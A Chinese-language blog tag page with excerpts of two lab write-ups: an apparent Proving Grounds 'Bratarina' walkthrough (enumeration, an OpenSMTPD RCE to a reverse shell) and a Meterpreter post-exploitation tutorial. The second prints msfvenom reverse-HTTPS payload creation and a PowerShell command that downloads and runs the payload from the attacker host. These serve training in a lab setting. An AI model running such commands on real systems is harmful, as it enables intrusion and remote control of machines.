發表文章

目前顯示的是有「payload」標籤的文章

Proving Grounds Practice : Bratarina Walkthrough

圖片
 Proving Grounds Practice : Bratarina Walkthrough Foothole (立足點 ) : 25 Port 服務 OpenSMTPD 使用 Exploit RCE 拿到 Reverse Shell PE ( 提權 ) : 不用 PE 注意事項 : 指令有限制特殊字元與符號限制,要使用 " 與 \ 來避開 Rustscan,└─$ rustscan -a 192.168.156.71 --scripts none --ulimit 5000 | tee rustscan snmp check,└─$ sudo nmap -sU -p 161 192.168.156.71 | tee snmp                           nmap enum4linux,└─$ enum4linux -a 192.168.156.71 | tee enum4linux 發現 backups 資料夾 使用者發現三個帳號 neil、_smtpd、_smtpq  資料夾中有一個 passwd.bak 檔案,將檔案抓回來到 kali,測試寫入 test.txt 失敗 cat passwd.bak 發現 3 個帳號,有兩個很特別看來是 SMTP 服務使用帳號 帳號 neil、_smtpd、_smtpq  hydra 測試 neil 跑了一段時間後沒有結果 whatweb,└─$ whatweb -v http://192.168.156.71               80 / 80 /robots.txt searchsploit FlaskBB 沒有結果 gobuster 80 / 80 /index.html gobuster /static 幾個繼續查找與逛了一番後沒有發現 searchsploit OpenSMTPD 發現一個 RCE 測試後發現 & 字元無效 改用 python 目的是避掉 & 字元,相關路徑加上 " 與 \ 做特殊字源處理 └─$ pyth...

Meterpreter 核心利用後功能與模組暨旋轉

圖片
 Meterpreter 核心利用後功能與模組暨旋轉 攻擊機 192.168.45.242 靶機 192.168.186.223(Windows) 建立一個 payload 名稱為 met.exe 如下 msfvenom -p windows/x64/meterpreter_reverse_https LHOST=192.168.45.242 LPORT=443 -f exe -o met.exe sudo msfconsole -q 啟動  Metasploit search multi handler 並選擇 5 (use 5) use 5 後 show options 看一下如下圖,payload 是 generic/shell_reverse_tcp 先將 payload 改成 windows/x64/meterpreter_reverse_https 指令 set payload windows/x64/meterpreter_reverse_https 再 show options 看一下必要的欄位 set LHOST 192.168.45.242 & set LPORT 443 執行 run,可以看到攻擊機在本機的 443 Port 上執行了 reverse handler 假設 Windows 靶機已經有一個 4444 連線 shell   下載我們一開始建立的 met.exe,指令如下,啟動 powershell 然後 iwr 下載再 dir 看一下 powershell iwr -uri http://192.168.45.242/met.exe -Outfile met.exe dir 執行 payload met.exe 剛剛建立的 443 listen 進來了,執行 idletime 看一下閒置時間 上圖輸出表示使用者已經 27 分 14 秒沒有與系統交互,這表示使用者可能已經離開了電腦 如果 idletime 指令的結果顯示使用者離開,我們可以以此為契機執行可能會短暫顯示命令列視窗(例如CMD或PowerShell)的程式或指令。 對於幾個後利用功能,我們需要管理權限才能執行它們。 Metasploit 包含指令 getsystem,該指令嘗試自動將我們的權限提升到 NT ...